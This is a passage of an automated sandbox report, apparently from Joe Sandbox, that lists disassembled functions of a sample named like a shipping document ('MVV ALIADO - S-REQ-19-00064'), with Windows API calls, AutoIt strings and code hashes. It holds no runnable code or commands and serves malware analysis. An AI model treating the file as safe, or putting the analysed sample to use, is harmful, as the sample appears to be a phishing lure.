InterlockedExchange.KERNEL32(?,000001F6), ref: 006C9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,006F5DEE,?,?,?,?,?,0068ED63), ref: 006C9A78

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fe705b985254282cac8de734c2ffba18d786bd0367bea44902b57b913e58d6b4
Instruction ID: 0d5496eb1b1561ce5f95dbc72a8753596531e76c86344215d440f561893a912b
Opcode Fuzzy Hash: fe705b985254282cac8de734c2ffba18d786bd0367bea44902b57b913e58d6b4
Instruction Fuzzy Hash: A2F05E32141311EBD7211BE4EC8DEEA772AFF88301B144629F603911A8DFB99D11DB64

Function 00681CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0069F4EA: std::exception::exception.LIBCMT ref: 0069F51E
Part of subcall function 0069F4EA: __CxxThrowException@8.LIBCMT ref: 0069F533

__swprintf.LIBCMT ref: 00681EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00681D49

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 6f6df7acf53b35ff26f9a6e0bf1e931e551c39b193f3f545307a27251de34856
Instruction ID: 9ae872720d5236533cc10ba07e31a1e41419a30e8bb6803c501fba37f1cd57d7
Opcode Fuzzy Hash: 6f6df7acf53b35ff26f9a6e0bf1e931e551c39b193f3f545307a27251de34856
Instruction Fuzzy Hash: 7C916C711042069FC764FF24C996CBAB7EABF85710F004A1DF9859B2A1DB30ED05CB96

Function 006DAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006DB006
CharUpperBuffW.USER32(?,?), ref: 006DB115
VariantClear.OLEAUT32(?), ref: 006DB298

Part of subcall function 006C9DC5: VariantInit.OLEAUT32(00000000), ref: 006C9E05
Part of subcall function 006C9DC5: VariantCopy.OLEAUT32(?,?), ref: 006C9E0E
Part of subcall function 006C9DC5: VariantClear.OLEAUT32(?), ref: 006C9E1A

Strings

AUTOIT.ERROR, xrefs: 006DB11B
Incorrect Parameter format, xrefs: 006DB03E, 006DB20B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: cc5098c2895e013ac5f8ab5071c6fff3a1ffa98631e16156d09d8a39362b83bc
Instruction ID: e31b514716a523958448f8d5b393be7f5e2204853be92f1525ffde5a8e6fe09d
Opcode Fuzzy Hash: cc5098c2895e013ac5f8ab5071c6fff3a1ffa98631e16156d09d8a39362b83bc
Instruction Fuzzy Hash: B3918D71A04301DFCB50EF24C4819AAB7F6EF88714F04492EF89A9B362DB31E945CB52

Function 006C5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069C6F4: _wcscpy.LIBCMT ref: 0069C717

_memset.LIBCMT ref: 006C5438
GetMenuItemInfoW.USER32(?), ref: 006C5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006C5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006C553D

Strings

0, xrefs: 006C5430

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: a718d5a77d14d56a1c9a8c44a7c894e15898ead7f87dec161f3121f749420540
Instruction ID: 40c1cc01b230a98893f827f0d7392269873d39ab7fa107b06642c22cd5f8c2a8
Opcode Fuzzy Hash: a718d5a77d14d56a1c9a8c44a7c894e15898ead7f87dec161f3121f749420540
Instruction Fuzzy Hash: C05104711047019BD754AB28CC40FBBB7EAEB95360F84062DF897D3290EBA4EDC48B52

Function 006C0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006C027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006C02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006C02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006C0344

Strings

DllGetClassObject, xrefs: 006C02B7

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 79d5657203e9296b253b10c9acc5e085f67e0f4f8c00e7d7e1bde7f0df43e977
Instruction ID: e9e2513cbae73077cc0830725c5e26252396ac7275b3c90b166c1642f0614078
Opcode Fuzzy Hash: 79d5657203e9296b253b10c9acc5e085f67e0f4f8c00e7d7e1bde7f0df43e977
Instruction Fuzzy Hash: AD416DB1604209EFEB15CF54C884FAA7BBAEF44310F1481ADE9099F246D7B5DD45CBA0

Function 006C5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C5075
GetMenuItemInfoW.USER32 ref: 006C5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 006C50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00741708,00000000), ref: 006C5120

Strings

0, xrefs: 006C506D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 39e054ab53e0e706fb223072cb5d09d66a80481819c9ff58a9c0d9ee7779cd30
Instruction ID: 9a0fe6b0bf5dc3065996b9a06902363d84362077a4793373538b5ae79db504b9
Opcode Fuzzy Hash: 39e054ab53e0e706fb223072cb5d09d66a80481819c9ff58a9c0d9ee7779cd30
Instruction Fuzzy Hash: A7417A712047419FD7209F24DC89F6ABBA6EB85324F184A1EF89697291D730E980CB66

Function 006CE698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006CE742
GetLastError.KERNEL32(?,00000000), ref: 006CE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006CE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006CE7B9

Strings

p1#v`K$v, xrefs: 006CE78D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID: p1#v`K$v
API String ID: 3321077145-1068180069
Opcode ID: 0fdab8256a8d42e10876c74aa1c7652e5ae4eb5f4deb1399a0ee8924746a3cda
Instruction ID: 4b937ceea95479b4f57fe9ed35cdfa0ab30e355574fa1b707f97a25bc0f07adc
Opcode Fuzzy Hash: 0fdab8256a8d42e10876c74aa1c7652e5ae4eb5f4deb1399a0ee8924746a3cda
Instruction Fuzzy Hash: A4413A39600610DFCF11EF55C845A6DBBE6FF59710B098098E9069B3A2CB34FD01DBA5

Function 006E0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 006E0587

Strings

stdcall, xrefs: 006E0609
cdecl, xrefs: 006E05DE
winapi, xrefs: 006E05F8
none, xrefs: 006E0662

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: d1c7dae2cc2522238717e80579c4cff8536f1c98ba3b0bcba307c898fdbd5391
Instruction ID: 7fc0c7ae84850cd7e3bf09d1a085727d3088e8f07c335f04674c2a3d343841dc
Opcode Fuzzy Hash: d1c7dae2cc2522238717e80579c4cff8536f1c98ba3b0bcba307c898fdbd5391
Instruction Fuzzy Hash: AA31D230500656AFDF00EF64C841AEEB3B6FF55314B10862DE466A77D2DBB1E946CB90

Function 006BB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006BB88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006BB8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 006BB8D1

Strings

ComboBox, xrefs: 006BB815
ListBox, xrefs: 006BB84D

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 94b341f412fe9013f102b637775b73cbaea1527022be7cb0f2199b7957e2c06c
Instruction ID: 10013d92289106e7bf38a714bc21530089f7601b736398f510f8488dc85c6f3f
Opcode Fuzzy Hash: 94b341f412fe9013f102b637775b73cbaea1527022be7cb0f2199b7957e2c06c
Instruction Fuzzy Hash: 7A21F6B6900104BFDB54ABB8D886DFE77BEDF05350B10422DF411A71E1DBB84D469764

Function 006D43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006D4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006D4457
InternetCloseHandle.WININET(00000000), ref: 006D449E

Part of subcall function 006D5052: GetLastError.KERNEL32(?,?,006D43CC,00000000,00000000,00000001), ref: 006D5067

Strings

, xrefs: 006D4450

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 1c3c3b42003fe6ae3baa31b635fce7c53ed4e9d538076180f00843918f0d678f
Instruction ID: b65b3b1b3e9d9e17714d74aec144a1cdc697b5e66c71f03a36127ec562db4744
Opcode Fuzzy Hash: 1c3c3b42003fe6ae3baa31b635fce7c53ed4e9d538076180f00843918f0d678f
Instruction Fuzzy Hash: 742180B1900208BFE7219F94CC85EBFB6EEEB49748F10811FF10596240DE748D4597B5

Function 006E90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0069D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0069D1BA
Part of subcall function 0069D17C: GetStockObject.GDI32(00000011), ref: 0069D1CE
Part of subcall function 0069D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0069D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006E915C
LoadLibraryW.KERNEL32(?), ref: 006E9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006E9178
DestroyWindow.USER32(?), ref: 006E9180

Strings

SysAnimate32, xrefs: 006E9137

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: df5a610df659d22beddf5c26b1edb976c04abc600ea7588553b18dd81fd6c5c8
Instruction ID: aff0f0ac3329027ae0cbe1cada98a0d67f845bf24792ab1ed55d20f6926f68b4
Opcode Fuzzy Hash: df5a610df659d22beddf5c26b1edb976c04abc600ea7588553b18dd81fd6c5c8
Instruction Fuzzy Hash: ED219F71201386BBEF204E66DC84EFA77AEEF993A4F104618F91492290D772DC52A774

Function 006C9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 006C9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006C95B9
GetStdHandle.KERNEL32(0000000C), ref: 006C95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006C9605

Strings

nul, xrefs: 006C9600

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: cc03c2cded0fbb0972550140f2a4954cbdcfa882ccb8ba64816e2075e0eb7b25
Instruction ID: 9d6203df3cdb313654f5926b25c80292bf8b207d5649d1864def6fd3a85f96bd
Opcode Fuzzy Hash: cc03c2cded0fbb0972550140f2a4954cbdcfa882ccb8ba64816e2075e0eb7b25
Instruction Fuzzy Hash: 36213DB1500205ABEB21AF65DC09FEA77E5EF45720F604A1DF9A1D72D0DB70D941CB60

Function 006C9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 006C9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006C9683
GetStdHandle.KERNEL32(000000F6), ref: 006C9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006C96CE

Strings

nul, xrefs: 006C96C9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: dc72f8358969a1b9d7ab0382204f0e34469ff586a47ee2ab2cc7303f75cdf1a7
Instruction ID: 366ddf8e7b4906133541b0f026da5f43b92e089aa33d4afc3f9a984e7bafaba2
Opcode Fuzzy Hash: dc72f8358969a1b9d7ab0382204f0e34469ff586a47ee2ab2cc7303f75cdf1a7
Instruction Fuzzy Hash: 16215E715002059BEB209F6A9C49FAAB7E9EF45720F204A1DF8A1D73D0DB709841CB64

Function 006CDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006CDB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006CDB5E
__swprintf.LIBCMT ref: 006CDB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0071DC00), ref: 006CDBB5

Strings

%lu, xrefs: 006CDB71

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 56b5fb91da2f5cc8b0c1ea616684f3731741d18300598e201d812d3c0e040256
Instruction ID: a516242bc7ddb1e48ce97f7b5d5d2324a99e7a110428f97ab77eb2eba0030992
Opcode Fuzzy Hash: 56b5fb91da2f5cc8b0c1ea616684f3731741d18300598e201d812d3c0e040256
Instruction Fuzzy Hash: 0C21A175A00208AFCB10EFA4CD85EAEB7B9EF49714B00406DF509D7251DB70EE41CB64

Function 006BC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006BC84A
Part of subcall function 006BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 006BC85D
Part of subcall function 006BC82D: GetCurrentThreadId.KERNEL32 ref: 006BC864
Part of subcall function 006BC82D: AttachThreadInput.USER32(00000000), ref: 006BC86B

GetFocus.USER32 ref: 006BCA05

Part of subcall function 006BC876: GetParent.USER32(?), ref: 006BC884

GetClassNameW.USER32(?,?,00000100), ref: 006BCA4E
EnumChildWindows.USER32(?,006BCAC4), ref: 006BCA76
__swprintf.LIBCMT ref: 006BCA90

Strings

%s%d, xrefs: 006BCA8A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 1e26fb987b321a17c6f21700b4afb70c405fad1c10bde67e5c18ee5f2f785706
Instruction ID: ef9def92d35ca9e6719b4c05ea0b12504e941f17c7c374e5f3308fcfd40758bf
Opcode Fuzzy Hash: 1e26fb987b321a17c6f21700b4afb70c405fad1c10bde67e5c18ee5f2f785706
Instruction Fuzzy Hash: D21187B55002097BDB51BF94CC85FE9377E9F44714F00806AFE08AA182DB749A85DB74

Function 006A7A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 006A7AD8

Part of subcall function 006A7CF4: __mtinitlocknum.LIBCMT ref: 006A7D06
Part of subcall function 006A7CF4: EnterCriticalSection.KERNEL32(00000000,?,006A7ADD,0000000D), ref: 006A7D1F

InterlockedIncrement.KERNEL32(?), ref: 006A7AE5
__lock.LIBCMT ref: 006A7AF9
___addlocaleref.LIBCMT ref: 006A7B17

Strings

`p, xrefs: 006A7AA3

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `p
API String ID: 1687444384-509659610
Opcode ID: 07a13dc666a297fe054b9f97443010b14330889f077865077c02a5040c881516
Instruction ID: 0ebaf18814679ffe577b07301f48544c24f81606d35c183adf7708a84a77e251
Opcode Fuzzy Hash: 07a13dc666a297fe054b9f97443010b14330889f077865077c02a5040c881516
Instruction Fuzzy Hash: 15015BB1504B00EFE760EF75C90674AF7F1AF51321F20890EA49A966A1CBB4AA40CF19

Function 006EE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006EE33D
_memset.LIBCMT ref: 006EE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00743D00,00743D44), ref: 006EE37B
CloseHandle.KERNEL32 ref: 006EE38D

Strings

D=t, xrefs: 006EE346

Memory Dump Source

